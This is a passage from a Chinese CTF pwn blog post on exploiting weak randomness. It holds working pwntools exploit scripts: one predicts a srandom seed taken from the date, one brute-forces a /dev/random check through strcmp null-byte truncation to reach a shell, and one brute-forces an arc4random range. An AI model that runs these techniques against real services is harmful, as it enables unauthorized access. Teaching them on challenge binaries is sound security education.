class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctype <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">&quot;/home/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6&quot;</span>)</span><br><span class="line">elf = ELF(<span class="string">&quot;./pwn&quot;</span>)</span><br><span class="line">elf1 = cdll.LoadLibrary(<span class="string">&quot;/home/pwn/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc.so.6&quot;</span>)</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&quot;192.168.119.52&quot;</span>,<span class="number">53889</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;Let&#x27;s play a number guessing game.\n&quot;</span>)</span><br><span class="line"></span><br><span class="line">timer = <span class="built_in">int</span>(elf1.time(<span class="number">0</span>))</span><br><span class="line">tm = time.localtime(timer) </span><br><span class="line">day_of_year = tm.tm_yday-<span class="number">1</span> <span class="comment"># 这个加一很迷啊</span></span><br><span class="line">elf1.srandom(day_of_year)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    p.recvuntil(<span class="string">&quot;Guess a five-digit number I&#x27;m thinking of\n&gt; &quot;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>( (elf1.random()%<span class="number">90000</span>) + <span class="number">10000</span> ))</span><br><span class="line">    <span class="comment">#p.recvuntil(&quot;Wow, you are right!\n&quot;)</span></span><br><span class="line">    </span><br><span class="line"><span class="comment"># 下面随便输入什么都可以的</span></span><br><span class="line">p.recvuntil(<span class="string">&quot;Guess a five-digit number I&#x27;m thinking of\n&gt; &quot;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">p.recvuntil(<span class="string">&quot;Guess a five-digit number I&#x27;m thinking of\n&gt; &quot;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">p.recvuntil(<span class="string">&quot;You only got two of them wrong, flag still for you.&quot;</span>)</span><br><span class="line">p.recv()</span><br></pre></td></tr></table></figure></div>

<h1 id="什么是真随机"><a href="#什么是真随机" class="headerlink" title="什么是真随机"></a>什么是真随机</h1><ul>
<li><mark>真随机代表着我们无法通过libc去预测、模拟系统产生的随机数是多少<mark></mark></mark></li>
<li>下面模拟一个真随机数产生的过程：</li>
</ul>
<h2 id="dev-random获得随机数"><a href="#dev-random获得随机数" class="headerlink" title="&#x2F;dev&#x2F;random获得随机数"></a><mark>&#x2F;dev&#x2F;random获得随机数<mark></mark></mark></h2><div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdint.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">(<span class="type">void</span>)</span>&#123;</span><br><span class="line">	<span class="type">int</span> fd = open(<span class="string">&quot;/dev/random&quot;</span> , O_RDONLY);</span><br><span class="line">	<span class="keyword">if</span>(fd &lt; <span class="number">0</span>)&#123;</span><br><span class="line">		perror(<span class="string">&quot;Error open /dev/random&quot;</span>);</span><br><span class="line">		<span class="keyword">return</span>(<span class="number">1</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="type">uint32_t</span> num;</span><br><span class="line">	<span class="type">ssize_t</span> result = read(fd, &amp;num , <span class="keyword">sizeof</span>(num));</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;Random num is : %u\n&quot;</span>, num );</span><br><span class="line">	close(fd);</span><br><span class="line">	<span class="keyword">return</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<ul>
<li>产生的结果如下：</li>
</ul>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ubuntu24<span class="number">.04</span>: Random num <span class="keyword">is</span> : <span class="number">2697870537</span></span><br><span class="line">ubuntu22<span class="number">.04</span>: Random num <span class="keyword">is</span> : <span class="number">2754856894</span></span><br></pre></td></tr></table></figure></div>

<p>即使libc相同，但是产生的随机数还是不相同的，下面来了解一下&#x2F;dev&#x2F;random产生随机数的原理</p>
<blockquote>
<p>通过 <code>/dev/random</code> 获取随机数的原理涉及到操作系统的随机数生成机制。<code>/dev/random</code> 是 Linux 和类 Unix 操作系统中的一个设备文件，专门用于生成加密级别的高质量随机数。其工作原理如下：</p>
<h3 id="1-熵池的概念"><a href="#1-熵池的概念" class="headerlink" title="1. 熵池的概念"></a>1. <strong>熵池的概念</strong></h3><ul>
<li><code>/dev/random</code> 使用熵（entropy）来生成随机数。熵是系统中不可预测事件的来源，比如键盘输入、鼠标移动、硬盘访问时间等。这些事件的特性难以预测，因此可以作为随机数生成的来源。</li>
<li>操作系统维护一个“熵池”，即收集和存储这些不可预测事件产生的数据。当系统收集到足够的熵时，就可以利用这些数据生成高质量的随机数。</li>
</ul>
<h3 id="2-工作流程"><a href="#2-工作流程" class="headerlink" title="2. 工作流程"></a>2. <strong>工作流程</strong></h3><ul>
<li>当程序读取 <code>/dev/random</code> 时，操作系统会从熵池中提取熵，并使用某种加密安全的伪随机数生成器（CSPRNG）来输出随机数据。</li>
<li>当熵池中的熵不足时（即系统中没有足够的随机事件发生），读取 <code>/dev/random</code> 会阻塞（等待），直到收集到足够的熵。因此，<code>/dev/random</code> 适合需要高安全性、高随机性的应用场景，比如生成加密密钥。</li>
</ul>
<h3 id="3-阻塞和非阻塞"><a href="#3-阻塞和非阻塞" class="headerlink" title="3. 阻塞和非阻塞"></a>3. <strong>阻塞和非阻塞</strong></h3><ul>
<li><code>/dev/random</code> 是阻塞的。当熵池耗尽时，程序会被迫等待，直到系统收集到足够的熵为止，这可能导致延迟。</li>
<li>对应的非阻塞版本是 <code>/dev/urandom</code>。<code>/dev/urandom</code> 也使用熵池，但在熵耗尽时不会阻塞，而是继续使用伪随机数生成器生成随机数。虽然这减少了阻塞问题，但在某些极端安全要求下，使用 <code>/dev/random</code> 会更好。</li>
</ul>
<h3 id="4-常用场景"><a href="#4-常用场景" class="headerlink" title="4. 常用场景"></a>4. <strong>常用场景</strong></h3><ul>
<li><code>/dev/random</code> 主要用于加密操作、密钥生成、会话标识符等需要高随机性、无法预测的场景。</li>
</ul>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>通过 <code>/dev/random</code> 获取随机数的核心原理在于熵的采集与使用。系统不断从硬件和系统事件中收集不可预测的行为作为熵来生成随机数，确保生成的数具有高不可预测性，适用于高安全需求的场合。</p>
</blockquote>
<ul>
<li>&#x2F;dev&#x2F;random通过熵值来获取随机数，而熵值是不可预测的，并且是由于很多因素造成的，因此也造成了它的真随机性，但是我们可以用爆破来求出随机数。</li>
</ul>
<h3 id="例题-1"><a href="#例题-1" class="headerlink" title="例题"></a>例题</h3><p>题目：<code>buildctf real_random</code></p>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl __noreturn <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">char</span> buf[<span class="number">8</span>]; <span class="comment">// [rsp+8h] [rbp-18h] BYREF</span></span><br><span class="line">  <span class="type">char</span> s2[<span class="number">8</span>]; <span class="comment">// [rsp+10h] [rbp-10h] BYREF</span></span><br><span class="line">  <span class="type">unsigned</span> __int64 v5; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v5 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  my_init();</span><br><span class="line">  <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    get_random(s2);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;please input your text: &quot;</span>);</span><br><span class="line">    read(<span class="number">0</span>, buf, <span class="number">8uLL</span>);</span><br><span class="line">    <span class="keyword">if</span> ( !<span class="built_in">strcmp</span>(buf, s2) )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">printf</span>(<span class="string">&quot;Congratulations!!!&quot;</span>);</span><br><span class="line">      getshell();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">    &#123;</span><br><span class="line">      <span class="built_in">puts</span>(<span class="string">&quot;No,guess again!!!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p><code>get_random</code></p>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __fastcall <span class="title function_">get_random</span><span class="params">(<span class="type">char</span> *a1)</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">int</span> fd; <span class="comment">// [rsp+1Ch] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line">  fd = open(<span class="string">&quot;/dev/random&quot;</span>, <span class="number">0</span>);</span><br><span class="line">  <span class="keyword">if</span> ( fd &lt; <span class="number">0</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;failed to open the file!&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">-1</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  read(fd, a1, <span class="number">8uLL</span>);</span><br><span class="line">  <span class="keyword">return</span> close(fd);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<ul>
<li>很明显的<code>/dev/random</code>的真随机，但是难道就没有漏洞了吗？其实不然</li>
<li><code>strcmp</code>关键就在这个函数，遇到<code>\x00</code>就会停止比较，那么我们传入一个p64(0)，只要随机数的首字节是\x00，就会比较成功，并且极大的缩短了比较时间。</li>
</ul>
<h3 id="EXP-2"><a href="#EXP-2" class="headerlink" title="EXP"></a>EXP</h3><div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>,log_level=<span class="string">&#x27;debug&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p = remote(<span class="string">&quot;27.25.151.80&quot;</span>,<span class="number">37097</span>)</span><br><span class="line"><span class="comment">#p = process(&quot;./pwn&quot;)</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9999</span>):</span><br><span class="line">    p.recvuntil(<span class="string">&quot;please input your text: &quot;</span>)</span><br><span class="line">    payload = p64(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">    p.send(payload)</span><br><span class="line">    rev = p.recvuntil(<span class="string">b&#x27;\n&#x27;</span>)</span><br><span class="line">    success(<span class="string">f&quot;第<span class="subst">&#123;i+<span class="number">1</span>&#125;</span>次,recv<span class="subst">&#123;<span class="built_in">str</span>(rev)&#125;</span>&quot;</span>)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">b&quot;Congratulations!!!&quot;</span> <span class="keyword">in</span> rev:</span><br><span class="line">        p.interactive()</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>

<h2 id="arc4random"><a href="#arc4random" class="headerlink" title="arc4random"></a>arc4random</h2><blockquote>
<p><strong><code>arc4random()</code> 函数</strong>：</p>
<ul>
<li><code>arc4random()</code> 是一个用于生成随机数的函数，常见于 BSD 系统，它基于一个称为 ARC4 的加密算法实现。</li>
<li>这个函数不需要任何输入参数，直接返回一个伪随机数，通常是一个 <code>32-bit</code> 的无符号整数。</li>
</ul>
</blockquote>
<ul>
<li>基本的用法：</li>
</ul>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="comment">// 无需seed直接生成随机数</span></span><br><span class="line">    <span class="type">uint32_t</span> random_number = arc4random();</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Random number: %u\n&quot;</span>, random_number);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<h3 id="例题-2"><a href="#例题-2" class="headerlink" title="例题"></a>例题</h3><p><code>moectf2024 Catch_the_canary!</code></p>
<ul>
<li>只看随机数部分：</li>
</ul>
<div class="highlight-container" data-rel="C"><figure class="iseeu highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">v3 = arc4random(argc, argv, envp);</span><br><span class="line">v4 = v3 - <span class="number">0xFEFFFFFFFFFFFF</span>LL * ((__int64)((<span class="number">0x4040404040404081</span>LL * (<span class="type">unsigned</span> __int128)v3) &gt;&gt; <span class="number">64</span>) &gt;&gt; <span class="number">54</span>);</span><br><span class="line"></span><br><span class="line">v8 = (<span class="type">unsigned</span> <span class="type">int</span>)arc4random(argc, <span class="number">0LL</span>, v4) % <span class="number">0x2345</span> + <span class="number">16768186</span>;</span><br><span class="line">init();</span><br><span class="line">write(<span class="number">1</span>, <span class="string">&quot;Here, my canary, with a cage.\n&quot;</span>, <span class="number">0x1E</span>uLL);</span><br><span class="line">write(<span class="number">1</span>, <span class="string">&quot;[Info] Password required.\n&quot;</span>, <span class="number">0x1A</span>uLL);</span><br><span class="line"><span class="keyword">while</span> ( (<span class="type">unsigned</span> <span class="type">int</span>)__isoc99_scanf(<span class="string">&quot;%u&quot;</span>, &amp;v6) == <span class="number">-1</span> || v8 != v6 )</span><br><span class="line">  write(<span class="number">1</span>, <span class="string">&quot;[Error] Wrong! Try again.\n&quot;</span>, <span class="number">0x1A</span>uLL);</span><br><span class="line">write(<span class="number">1</span>, <span class="string">&quot;[Info] Cage opened.\n&quot;</span>, <span class="number">0x14</span>uLL);</span><br><span class="line">write(<span class="number">1</span>, <span class="string">&quot;Oh, but I&#x27;ve got \&quot;cageincage\&quot;\nwhich is impossible to open.\nOne shot.\n&quot;</span>, <span class="number">0x45</span>uLL);</span><br></pre></td></tr></table></figure></div>

<ul>
<li>产生的是一个固定的随机数，所以我们只需要爆破即可：</li>
</ul>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">p.recvuntil(<span class="string">b&#x27;required.\n&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0xFFDCBA</span>,<span class="number">0xFFDCBA</span>+<span class="number">0x2345</span>):</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(i))</span><br><span class="line">    rev = p.recvuntil(<span class="string">b&#x27;] &#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">b&quot;Error&quot;</span> <span class="keyword">not</span> <span class="keyword">in</span> rev:</span><br><span class="line">        <span class="keyword">break</span></span><br></pre></td></tr></table></figure></div>


        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> 随机数专题</li>
        <li><strong>Author:</strong> D0wnBe@t</li>
        <li><strong>Created at
                :</strong> 2024-10-14 11:54:21</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2024-11-06 13:05:25
            </li>
        
        <li>
            <strong>Link:</strong> http://downbeat.top/2024/10/14/随机数专题/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/ctf-pwn/">#ctf-pwn</a>&nbsp;
                    </li>
                
            </ul>
        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                    <div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="prev"
                        rel="prev"
                        href="/2024/10/15/moectf2024%E7%9F%A5%E8%AF%86%E7%82%B9%E6%B1%87%E6%80%BB/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">moectf2024知识点汇总</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2024/10/08/House-Of-Orange/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">House_Of_Orange</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
            <div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
                <div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.mjs';

      function loadWaline() {
        init({
          el: '#waline',
          serverURL: 'https://waline-test-3zr97q8gp-xtudownbeats-projects.vercel.app/',
          lang: 'zh-CN',
          dark: 'body[class~="dark-mode"]',
          reaction: false,
          requiredMeta: ['nick', 'mail'],
          emoji: [],
          
          
        });
      }

      if (typeof swup !== 'undefined') {
        loadWaline();
      } else {
        window.addEventListener('DOMContentLoaded', loadWaline);
      }
    </script>



        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">随机数专题</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E4%BC%AA%E9%9A%8F%E6%9C%BA%EF%BC%9F"><span class="nav-text">什么是伪随机？</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%B8%8B%E9%9D%A2%E7%AE%80%E5%8D%95%E4%BB%8B%E7%BB%8D%E4%B8%80%E4%B8%8B%E9%9A%8F%E6%9C%BA%E6%95%B0%E7%94%9F%E4%BA%A7%E7%9A%84%E4%BB%A3%E7%A0%81"><span class="nav-text">下面简单介绍一下随机数生产的代码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BC%AA%E9%9A%8F%E6%9C%BA%E7%9A%84%E5%88%A9%E7%94%A8"><span class="nav-text">伪随机的利用</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98"><span class="nav-text">例题</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#srand-rand"><span class="nav-text">srand&#x2F;rand</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP"><span class="nav-text">EXP</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#srandom-localtime"><span class="nav-text">srandom&#x2F;localtime</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BB%A3%E7%A0%81%E8%A7%A3%E9%87%8A"><span class="nav-text">代码解释</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP-1"><span class="nav-text">EXP</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E7%9C%9F%E9%9A%8F%E6%9C%BA"><span class="nav-text">什么是真随机</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#dev-random%E8%8E%B7%E5%BE%97%E9%9A%8F%E6%9C%BA%E6%95%B0"><span class="nav-text">&#x2F;dev&#x2F;random获得随机数</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E7%86%B5%E6%B1%A0%E7%9A%84%E6%A6%82%E5%BF%B5"><span class="nav-text">1. 熵池的概念</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-%E5%B7%A5%E4%BD%9C%E6%B5%81%E7%A8%8B"><span class="nav-text">2. 工作流程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-%E9%98%BB%E5%A1%9E%E5%92%8C%E9%9D%9E%E9%98%BB%E5%A1%9E"><span class="nav-text">3. 阻塞和非阻塞</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-%E5%B8%B8%E7%94%A8%E5%9C%BA%E6%99%AF"><span class="nav-text">4. 常用场景</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-text">总结</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98-1"><span class="nav-text">例题</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#EXP-2"><span class="nav-text">EXP</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#arc4random"><span class="nav-text">arc4random</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%BE%8B%E9%A2%98-2"><span class="nav-text">例题</span></a></li></ol></li></ol></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">D0wnBe@t</a>
            
                
                <p class="post-count space-x-0.5">
                    <span>
                        32 posts in total
                    </span>
                    
                        <span>
                            32.9k words in total
                        </span>
                    
                </p>
            
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
                    <span id="busuanzi_container_site_uv" class="lg:!block">
                        <span class="text-sm">VISITOR COUNT</span>
                        <span id="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="lg:!block">
                        <span class="text-sm">TOTAL PAGE VIEWS</span>
                        <span id="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="relative text-center lg:absolute lg:left-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-left">
            <span class="lg:block text-sm">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg class="relative top-[2px] inline-block align-baseline" version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" class="text-base" href="https://hexo.io">Hexo</a></span>
            <span class="text-sm lg:block">THEME&nbsp;<a class="text-base" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.7.3</a></span>
        </div>
        
        
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
            <script data-swup-reload-script>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex justify-center items-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex justify-center items-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex justify-center items-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex justify-center items-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex justify-center items-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fa-solid fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
